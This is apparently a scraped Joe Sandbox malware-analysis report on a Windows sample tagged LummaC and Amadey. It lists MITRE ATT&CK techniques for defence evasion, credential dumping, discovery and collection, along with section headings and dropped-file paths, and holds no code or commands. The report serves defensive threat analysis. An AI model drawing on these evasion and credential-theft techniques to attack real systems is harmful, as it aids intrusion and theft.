Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

C:\Program Files\Windows Media Player\graph\graph.exe

C:\ProgramData\DAECAECF

C:\ProgramData\EBGCFBGCBFHJECBGDAKKJDGHII

C:\ProgramData\ECFCBKJDBFIJKFHIIDAA

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre